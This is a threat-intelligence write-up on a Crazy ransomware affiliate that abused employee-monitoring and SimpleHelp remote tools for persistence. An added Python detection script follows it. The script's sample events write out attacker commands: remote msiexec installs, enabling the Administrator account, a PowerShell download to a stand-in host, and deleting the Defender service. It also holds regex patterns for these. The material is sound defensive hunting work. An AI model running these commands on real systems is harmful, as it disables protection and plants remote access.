Crazy Ransomware Operator Weaponizes Employee Monitoring Software for Stealth Persistence
A Crazy ransomware affiliate is abusing legitimate employee monitoring software and remote support tools to maintain stealth persistence inside corporate networks, blending malicious activity with normal administrative operations before deploying ransomware.
Researchers at Huntress investigated multiple intrusions in which the threat actor deployed Net Monitor for Employees Professional alongside the SimpleHelp remote access client. Both are legitimate, commercially available tools, so the attacker's sessions and file transfers looked like standard enterprise administration rather than malware activity.
Initial Access and Persistence
Both observed breaches were enabled through compromised SSL VPN credentials. Once inside, the attacker installed Net Monitor for Employees Professional using the Windows Installer utility (msiexec.exe), pulling the agent directly from the developer's website. The tool provided full interactive access — remote desktop viewing, file transfer, and command execution on compromised systems.
The attacker attempted to enable the built-in local Administrator account via net user administrator /active:yes and established redundant persistence by downloading the SimpleHelp remote access client through PowerShell. The SimpleHelp binary was disguised with filenames mimicking legitimate processes: vshost.exe (resembling the Visual Studio hosting process) and OneDriveSvc.exe, staged under C:\ProgramData\OneDriveSvc\.
This dual-tool approach ensured continued access even if one tool was discovered and removed.
Pre-Deployment Reconnaissance
In one intrusion, the attacker configured monitoring rules within SimpleHelp to trigger alerts when victims accessed cryptocurrency wallets or remote management tools. Huntress observed the agent continuously cycling through triggers for cryptocurrency-related keywords including wallet services (MetaMask, Exodus, Blockchain), exchanges (Binance, Bybit, KuCoin, Bitrue, Poloniex), blockchain explorers (Etherscan, BscScan), and the payment platform Payoneer.
The agent simultaneously monitored for remote access tool keywords — RDP, AnyDesk, UltraView, TeamViewer, and VNC — likely to detect if administrators were actively connecting to the compromised machine.
Defense Evasion
The attacker attempted to disable Windows Defender by stopping and deleting its associated services, removing the primary endpoint protection before ransomware deployment. Where Microsoft Defender Tamper Protection is enabled these stop and delete operations typically fail, but the attempt itself is a high-confidence signal and should be alerted on regardless of whether it succeeded.
Attribution
While only one incident progressed to actual Crazy ransomware deployment, Huntress assessed that both intrusions were conducted by the same operator, based on the reused disguised filename (vshost.exe) and overlapping command-and-control infrastructure.
Recommendation
Organizations should monitor for unauthorized installations of remote monitoring and employee surveillance tools, which increasingly serve as attacker persistence mechanisms that blend into legitimate network traffic. Enforce MFA on all SSL VPN and remote access services; both observed intrusions began with compromised VPN credentials. Audit for unexpected SimpleHelp, Net Monitor, or similar RMM tool deployments, and compare any RMM agent found against the list of tools your organization has actually approved. Alert on msiexec.exe invoked with a URL as the package source, on PowerShell download cradles writing executables into ProgramData directories, on enabling of the built-in Administrator account, and on sc.exe or net.exe stopping or deleting Windows Defender services.
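The following Python script is an added example, not Huntress's tooling or code from the original article. It runs the detections recommended above (msiexec.exe with a URL source, PowerShell download cradles writing into ProgramData, enabling the built-in Administrator account, Defender service tampering, and the disguised filenames reported in the intrusions) over process-creation events. The events, the field names (Image, CommandLine, ParentImage, modelled on a JSON export of Sysmon Event ID 1), and every URL and path in them are constructed for the example and are not indicators from the investigation.

```python
"""Hunt for the Crazy ransomware affiliate's tradecraft in process-creation events.

Added example; not Huntress's code. Field names follow a JSON export of Sysmon
Event ID 1 (assumption: adjust to your own log schema).
"""
import re

# Constructed sample events modelled on the intrusion chain described above.
# Hosts, URLs and paths are invented; they are not real indicators.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i https://example.invalid/agent.msi /qn",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net user administrator /active:yes",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -c Invoke-WebRequest https://example.invalid/a.exe "
                    r"-OutFile C:\ProgramData\OneDriveSvc\OneDriveSvc.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\ProgramData\OneDriveSvc\OneDriveSvc.exe",
     "CommandLine": r"C:\ProgramData\OneDriveSvc\OneDriveSvc.exe",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": "sc delete WinDefend",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # Benign noise: a local software deployment and the real OneDrive client.
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Deploy\7zip.msi /qn",
     "ParentImage": r"C:\Windows\CCM\ccmexec.exe"},
    {"Image": r"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "CommandLine": r'"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
     "ParentImage": r"C:\Windows\explorer.exe"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Common PowerShell download primitives (not exhaustive).
DOWNLOAD_CRADLE_RE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|DownloadFile|DownloadString|"
    r"Start-BitsTransfer|bitsadmin)", re.IGNORECASE)
# A drive-letter path to an executable/installer somewhere under ProgramData.
PROGRAMDATA_EXE_RE = re.compile(r"[A-Z]:\\ProgramData\\\S*\.(exe|dll|msi)\b", re.IGNORECASE)
ADMIN_ENABLE_RE = re.compile(r"\bnet1?(\.exe)?\s+user\s+administrator\s+/active:yes", re.IGNORECASE)
# Defender service names; sc.exe or net.exe stop/delete/config against them.
DEFENDER_TAMPER_RE = re.compile(
    r"\b(sc|net1?)(\.exe)?\s+(stop|delete|config)\s+"
    r"(WinDefend|WdNisSvc|Sense|WdFilter|WdBoot|WdNisDrv)\b", re.IGNORECASE)
# Filenames the article reports the SimpleHelp client was renamed to.
MASQUERADE_NAMES = {"vshost.exe", "onedrivesvc.exe"}


def basename(path):
    """Lower-cased final path component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the names of every rule that fires on a single event."""
    img = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if img == "msiexec.exe" and URL_RE.search(cmd):
        hits.append("msiexec_remote_installer")
    if img in ("powershell.exe", "pwsh.exe") and DOWNLOAD_CRADLE_RE.search(cmd) \
            and PROGRAMDATA_EXE_RE.search(cmd):
        hits.append("powershell_download_to_programdata")
    if ADMIN_ENABLE_RE.search(cmd):
        hits.append("builtin_administrator_enabled")
    if DEFENDER_TAMPER_RE.search(cmd):
        hits.append("defender_service_tamper")
    if img in MASQUERADE_NAMES:
        hits.append("known_masquerade_filename")
    return hits


def hunt(events):
    """Run every rule over every event; return {rule_name: [event indices]}."""
    findings = {}
    for i, ev in enumerate(events):
        for rule in classify(ev):
            findings.setdefault(rule, []).append(i)
    return findings


if __name__ == "__main__":
    for rule, idxs in hunt(SAMPLE_EVENTS).items():
        for i in idxs:
            print(f"{rule}: {SAMPLE_EVENTS[i]['CommandLine']}")
```

Run it as-is to see the five malicious events flagged and the two benign ones pass; to use it on real data, replace SAMPLE_EVENTS with your exported events and rename the keys to match your schema. The msiexec rule keys on a URL package source rather than on any particular installer name, so it also catches agents the article does not mention; the masquerade rule is deliberately narrow and is a low-effort indicator, not a substitute for an RMM allow-list.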